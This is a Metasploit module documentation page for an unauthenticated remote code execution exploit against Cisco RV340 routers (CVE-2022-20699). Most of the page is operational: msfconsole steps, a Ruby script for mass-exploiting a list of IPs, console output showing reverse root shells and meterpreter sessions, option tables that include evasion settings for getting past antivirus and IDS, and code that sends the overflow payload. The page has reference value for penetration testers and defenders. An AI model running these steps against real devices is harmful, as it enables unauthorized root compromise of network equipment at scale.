Cisco RV340 SSL VPN Unauthenticated Remote Code Execution - Metasploit
This page contains detailed information about how to use the exploit/linux/misc/cisco_rv340_sslvpn metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Cisco RV340 SSL VPN Unauthenticated Remote Code Execution
Module: exploit/linux/misc/cisco_rv340_sslvpn
Source code: modules/exploits/linux/misc/cisco_rv340_sslvpn.rb
Disclosure date: 2022-02-02
Last modification time: 2022-06-10 14:01:57 +0000
Supported architecture(s): armle
Supported platform(s): Linux
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2022-20699
This module exploits a stack buffer overflow in the Cisco RV series routers SSL VPN functionality. The default SSL VPN configuration is exploitable, with no authentication required and works over the Internet! The stack is executable and no ASLR is in place, which makes exploitation easier. Successful execution of this module results in a reverse root shell. A custom payload is used as Metasploit does not have ARMLE null free shellcode. This vulnerability was presented by the Flashback Team in Pwn2Own Austin 2021 and OffensiveCon 2022. For more information check the referenced advisory. This module has been tested in firmware versions 1.0.03.15 and above and works with around 65% reliability. The service restarts automatically so you can keep trying until you pwn it. Only the RV340 router was tested, but other RV series routers should work out of the box.
Module Ranking and Traits
Module Ranking:
- good: The exploit has a default target and it is the "common case" for this type of software (English, Windows 7 for a desktop app, 2012 for server, etc). More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-service-restarts: Module may crash the service, but the service restarts.
Basic Usage
Using cisco_rv340_sslvpn against a single host
Normally, you can use exploit/linux/misc/cisco_rv340_sslvpn this way:
msf > use exploit/linux/misc/cisco_rv340_sslvpn
msf exploit(cisco_rv340_sslvpn) > show targets
... a list of targets ...
msf exploit(cisco_rv340_sslvpn) > set TARGET target-id
msf exploit(cisco_rv340_sslvpn) > show options
... show and set options ...
msf exploit(cisco_rv340_sslvpn) > exploit
Using cisco_rv340_sslvpn against multiple hosts
But it looks like this is a remote exploit module, which means you can also engage multiple hosts.
First, create a list of IPs you wish to exploit with this module. One IP per line.
Second, set up a background payload listener. This payload should be the same as the one your cisco_rv340_sslvpn will be using:
- Do:
use exploit/multi/handler
- Do:
set PAYLOAD [payload]
- Set other options required by the payload
- Do:
set EXITONSESSION false
- Do:
run -j
At this point, you should have a payload listening.
Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:
<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'
File.open(ip_list, 'rb').each_line do |ip|
print_status("Trying against #{ip}")
run_single("use exploit/linux/misc/cisco_rv340_sslvpn")
run_single("set RHOST #{ip}")
run_single("set DisablePayloadHandler true")
#
# Set a payload that's the same as the handler.
# You might also need to add more run_single commands to configure other
# payload options.
#
run_single("set PAYLOAD [payload name]")
run_single("run")
end
</ruby>
Next, run the resource script in the console:
msf > resource [path-to-resource-script]
And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:
msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80
RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600
[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600
Required Options
- RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
Knowledge Base
Description
This module exploits a stack buffer overflow (CVE-2022-20699) in the Cisco RV series routers SSL VPN functionality. The default SSL VPN configuration is exploitable, with no authentication required and works over the Internet as seen in this video!
The stack is executable and no ASLR is in place, which makes exploitation easier. Successful execution of this module results in a reverse root shell. A custom payload is used as Metasploit does not have ARMLE null free shellcode. This vulnerability was presented by the Flashback Team in Pwn2Own Austin 2021 and OffensiveCon 2022.
This module has been tested in firmware versions 1.0.03.15 and above and works with around 65% reliability. The service restarts automatically so you can keep trying until you pwn it.
Only the RV340 router was tested, but other RV series routers should work out of the box.
For more information, check the advisory here and here.
Vulnerable Application
Cisco RV340 Router, firmware versions 1.0.03.24 and below. The bug is fixed in 1.0.03.26 and above.
Verification Steps
- Connect to the target on the WAN interface (or provide IP address)
- Make sure the SSLVPN service is turned on for the correct WAN interface
- Start msfconsole
- Do:
use exploits/linux/misc/cisco_rv340_sslvpn.rb
- Set RHOST, RPORT, LHOST and LPORT
- Do
check
- Do:
run
- You should get a shell.
Options
Module options (exploit/linux/misc/cisco_rv340_sslvpn):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 8443 yes The target port (TCP)
SSL true yes Use SSL
VHOST no HTTP server virtual host
Payload options (linux/armle/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
ARGV0 sh no argv[0] to pass to execve
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
SHELL /bin/sh yes The shell to execute.
Exploit target:
Id Name
-- ----
0 Cisco RV340 Firmware Version <= 1.0.03.24
Scenarios
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > check
[*] 5.55.55.62:8443 - The service is running, but could not be validated.
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > exploit
[*] Started reverse TCP handler on 5.55.55.1:4445
[*] 5.55.55.62:8443 - 5.55.55.62:8443 - Pwning Cisco RV340 Firmware Version <= 1.0.03.24
[*] Command shell session 30 opened (5.55.55.1:4445 -> 5.55.55.62:41976 ) at 2022-02-10 20:12:18 +0000
id
uid=0(root) gid=0(root)
uname -a
Linux router138486 4.1.8 #2 SMP Fri Oct 22 09:50:26 IST 2021 armv7l GNU/Linux
Go back to menu.
Msfconsole Usage
Here is how the linux/misc/cisco_rv340_sslvpn exploit module looks in the msfconsole:
msf6 > use exploit/linux/misc/cisco_rv340_sslvpn
[*] Using configured payload linux/armle/shell_reverse_tcp
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > show info
Name: Cisco RV340 SSL VPN Unauthenticated Remote Code Execution
Module: exploit/linux/misc/cisco_rv340_sslvpn
Platform: Linux
Arch: armle
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Good
Disclosed: 2022-02-02
Provided by:
Pedro Ribeiro <[email protected]>
Radek Domanski <[email protected]>
Module stability:
crash-service-restarts
Module reliability:
repeatable-session
Available targets:
Id Name
-- ----
0 Cisco RV340 Firmware Version <= 1.0.03.24
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...
]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploi
t-framework/wiki/Using-Metasploit
RPORT 8443 yes The target port (TCP)
SSL true yes Use SSL
VHOST no HTTP server virtual host
Payload information:
Description:
This module exploits a stack buffer overflow in the Cisco RV series
routers SSL VPN functionality. The default SSL VPN configuration is
exploitable, with no authentication required and works over the
Internet! The stack is executable and no ASLR is in place, which
makes exploitation easier. Successful execution of this module
results in a reverse root shell. A custom payload is used as
Metasploit does not have ARMLE null free shellcode. This
vulnerability was presented by the Flashback Team in Pwn2Own Austin
2021 and OffensiveCon 2022. For more information check the
referenced advisory. This module has been tested in firmware
versions 1.0.03.15 and above and works with around 65% reliability.
The service restarts automatically so you can keep trying until you
pwn it. Only the RV340 router was tested, but other RV series
routers should work out of the box.
References:
https://nvd.nist.gov/vuln/detail/CVE-2022-20699
https://www.youtube.com/watch?v=O1uK_b1Tmts
https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Austin_2021/flashback_connects/flashback_connects.md
https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Austin2021/flashback_connects/flashback_connects.md
https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-smb-mult-vuln-KA9PK6D.html
Module Options
This is a complete list of options available in the linux/misc/cisco_rv340_sslvpn exploit:
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > show options
Module options (exploit/linux/misc/cisco_rv340_sslvpn):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][..
.]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasplo
it-framework/wiki/Using-Metasploit
RPORT 8443 yes The target port (TCP)
SSL true yes Use SSL
VHOST no HTTP server virtual host
Payload options (linux/armle/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
ARGV0 sh no argv[0] to pass to execve
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
SHELL /bin/sh yes The shell to execute.
Exploit target:
Id Name
-- ----
0 Cisco RV340 Firmware Version <= 1.0.03.24
Advanced Options
Here is a complete list of advanced options supported by the linux/misc/cisco_rv340_sslvpn exploit:
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > show advanced
Module advanced options (exploit/linux/misc/cisco_rv340_sslvpn):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoCheck true no Run check before exploit
CHOST no The local client address
CPORT no The local client port
ConnectTimeout 10 yes Maximum number of seconds to establi
sh a TCP connection
ContextInformationFile no The information file that contains c
ontext information
DOMAIN WORKSTATION yes The domain to use for Windows authen
tication
DigestAuthIIS true no Conform to IIS, should work for most
servers. Only set to false for non-
IIS servers
DisablePayloadHandler false no Disable the handler code for the sel
ected payload
EnableContextEncoding false no Use transient context when encoding
payloads
FingerprintCheck true no Conduct a pre-exploit fingerprint ve
rification
ForceExploit false no Override check result
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for aut
hentication
HttpRawHeaders no Path to ERB-templatized raw headers
to append to existing headers
HttpTrace false no Show the raw HTTP requests and respo
nses
HttpTraceColors red/blu no HTTP request and response colors for
HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for aut
hentication
SSLCipher no String for SSL cipher - "DHE-RSA-AES
256-SHA" or "ADH"
SSLServerNameIndicatio no SSL/TLS Server Name Indication (SNI)
n
SSLVerifyMode PEER no SSL verification method (Accepted: C
LIENT_ONCE, FAIL_IF_NO_PEER_CERT, NO
NE, PEER)
SSLVersion Auto yes Specify the version of SSL/TLS to be
used (Auto, TLS and SSL23 are auto-
negotiate) (Accepted: Auto, TLS, SSL
23, SSL3, TLS1, TLS1.1, TLS1.2)
UserAgent Mozilla/5.0 (iPad; CPU no The User-Agent header to use for all
OS 15_3_1 like Mac OS requests
X) AppleWebKit/605.1.
15 (KHTML, like Gecko)
Version/15.2 Mobile/1
5E148 Safari/604.1
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this modul
e
WfsDelay 2 no Additional delay in seconds to wait
for a session
Payload advanced options (linux/armle/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) sys
tem call
AutoRunScript no A script to run automatically on session cr
eation.
AutoVerifySession true yes Automatically verify and drop invalid sessi
ons
CommandShellCleanupCom no A command to run before the session is clos
mand ed
CreateSession true no Create a new session for every successful l
ogin
InitialAutoRunScript no An initial script to run on session creatio
n (before AutoRunScript)
PrependChrootBreak false no Prepend a stub that will break out of a chr
oot (includes setreuid to root)
PrependFork false no Prepend a stub that starts the payload in i
ts own process via fork
PrependSetgid false no Prepend a stub that executes the setgid(0)
system call
PrependSetregid false no Prepend a stub that executes the setregid(0
, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(
0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(
0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0
, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0)
system call
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specifi
ed. Connect back will NOT go through proxy
but directly to LHOST
ReverseListenerBindAdd no The specific IP address to bind to on the l
ress ocal system
ReverseListenerBindPor no The port to bind to on the local system if
t different from LPORT
ReverseListenerComm no The specific communication channel to use f
or this listener
ReverseListenerThreade false yes Handle every connection in a new thread (ex
d perimental)
StagerRetryCount 10 no The number of times the stager should retry
if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager be
tween reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the linux/misc/cisco_rv340_sslvpn module can exploit:
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > show targets
Exploit targets:
Id Name
-- ----
0 Cisco RV340 Firmware Version <= 1.0.03.24
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the linux/misc/cisco_rv340_sslvpn exploit:
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
2 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
3 payload/generic/ssh/interact normal No Interact with Established SSH Connection
4 payload/linux/armle/exec normal No Linux Execute Command
5 payload/linux/armle/meterpreter/bind_tcp normal No Linux Meterpreter, Bind TCP Stager
6 payload/linux/armle/meterpreter/reverse_tcp normal No Linux Meterpreter, Reverse TCP Stager
7 payload/linux/armle/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline
8 payload/linux/armle/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline
9 payload/linux/armle/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline
10 payload/linux/armle/shell/bind_tcp normal No Linux dup2 Command Shell, Bind TCP Stager
11 payload/linux/armle/shell/reverse_tcp normal No Linux dup2 Command Shell, Reverse TCP Stager
12 payload/linux/armle/shell_bind_tcp normal No Linux Command Shell, Reverse TCP Inline
13 payload/linux/armle/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline
Evasion Options
Here is the full list of possible evasion options supported by the linux/misc/cisco_rv340_sslvpn exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::method_random_ca false no Use random casing for the HTTP method
se
HTTP::method_random_in false no Use a random invalid, HTTP method for reque
valid st
HTTP::method_random_va false no Use a random, but valid, HTTP method for re
lid quest
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP r
equest
HTTP::pad_fake_headers 0 no How many fake headers to insert into the HT
_count TP request
HTTP::pad_get_params false no Insert random, fake query string variables
into the request
HTTP::pad_get_params_c 16 no How many fake query string variables to ins
ount ert into the request
HTTP::pad_method_uri_c 1 no How many whitespace characters to use betwe
ount en the method and uri
HTTP::pad_method_uri_t space no What type of whitespace to use between the
ype method and uri (Accepted: space, tab, apach
e)
HTTP::pad_post_params false no Insert random, fake post variables into the
request
HTTP::pad_post_params_ 16 no How many fake post variables to insert into
count the request
HTTP::pad_uri_version_ 1 no How many whitespace characters to use betwe
count en the uri and version
HTTP::pad_uri_version_ space no What type of whitespace to use between the
type uri and version (Accepted: space, tab, apac
he)
HTTP::uri_dir_fake_rel false no Insert fake relative directories into the u
ative ri
HTTP::uri_dir_self_ref false no Insert self-referential directories into th
erence e uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-no
rmal, hex-noslashes, hex-random, hex-all, u
-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../
../)
HTTP::uri_fake_params_ false no Add a fake start of params to the URI (eg:
start /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslas false no Use back slashes instead of forward slashes
hes in the uri
HTTP::version_random_i false no Use a random invalid, HTTP version for requ
nvalid est
HTTP::version_random_v false no Use a random, but valid, HTTP version for r
alid equest
TCP::max_send_size 0 no Maxiumum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = di
sable)
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Failed to connect to the chosen application
Here is a relevant code snippet related to the "Failed to connect to the chosen application" error message:
246: )
247: rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError
248: sock.close if sock
249: end
250: if sock.nil?
251: fail_with(Failure::Unknown, 'Failed to connect to the chosen application')
252: end
253:
254: # also need to add support for old ciphers
255: ctx = OpenSSL::SSL::SSLContext.new
256: ctx.min_version = OpenSSL::SSL::SSL3_VERSION
<PEER> - Failed to connect to the router
Here is a relevant code snippet related to the "<PEER> - Failed to connect to the router" error message:
276: #
277: # It would be good to add some valid headers with semi random data for proper evasion :D
278: http = 'POST /' + rand_text_alphanumeric(0x86) + " HTTP/1.1\r\nContent-Length: 16404\r\n\r\n"
279:
280: sock.write(http)
281: sock.write(payload)
282: rescue ::Rex::ConnectionError
283: fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the router")
284: end
285: end
286: end
Go back to menu.
Related Pull Requests
- #16650 Merged Pull Request: Add #read_from_file for MSSQL and PostgreSQL, fix the MySQL implementation
- #16602 Merged Pull Request: Fix error when service is already running and update exception documentation in lib/msf/core/post/windows/services.rb
- #16627 Merged Pull Request: Add some error handling to update_payload_cache_size script
- #16679 Merged Pull Request: Fix missing and incomplete specs
- #16654 Merged Pull Request: Add named pipe pivot documentation
- #16571 Merged Pull Request: Vcenter offline mdb extract
- #16667 Merged Pull Request: Weekly dependency updates for Gemfile.lock
- #16666 Merged Pull Request: Correctly format the notes sections
- #16665 Merged Pull Request: Fix random compile c tool
- #16662 Merged Pull Request: Add faraday retry gem dependency
References
- CVE-2022-20699
- https://www.youtube.com/watch?v=O1uK_b1Tmts
- https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Austin_2021/flashback_connects/flashback_connects.md
- https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Austin2021/flashback_connects/flashback_connects.md
- https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-smb-mult-vuln-KA9PK6D.html
See Also
Check also the following modules related to this module:
- exploit/linux/http/cisco_asax_sfr_rce
- exploit/linux/http/cisco_firepower_useradd
- exploit/linux/http/cisco_hyperflex_file_upload_rce
- exploit/linux/http/cisco_hyperflex_hx_data_platform_cmd_exec
- exploit/linux/http/cisco_prime_inf_rce
- exploit/linux/http/cisco_rv32x_rce
- exploit/linux/http/cisco_rv_series_authbypass_and_rce
- exploit/linux/http/cisco_ucs_cloupia_script_rce
- exploit/linux/http/cisco_ucs_rce
- exploit/linux/ssh/cisco_ucs_scpuser
- exploit/multi/http/cisco_dcnm_upload
- exploit/multi/http/cisco_dcnm_upload_2019
- exploit/windows/browser/cisco_anyconnect_exec
- exploit/windows/browser/cisco_playerpt_setsource
- exploit/windows/browser/cisco_playerpt_setsource_surl
- exploit/windows/browser/cisco_webex_ext
- auxiliary/dos/cisco/cisco_7937g_dos
- auxiliary/dos/cisco/cisco_7937g_dos_reboot
- auxiliary/dos/cisco/ios_http_percentpercent
- auxiliary/dos/cisco/ios_telnet_rocem
- auxiliary/spoof/cisco/cdp
- auxiliary/spoof/cisco/dtp
- exploit/linux/http/cve_2019_1663_cisco_rmi_rce
- exploit/windows/browser/juniper_sslvpn_ive_setupdll
Authors
- Pedro Ribeiro <[email protected]>
- Radek Domanski <radek.domanski[at]gmail.com>
Version
This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.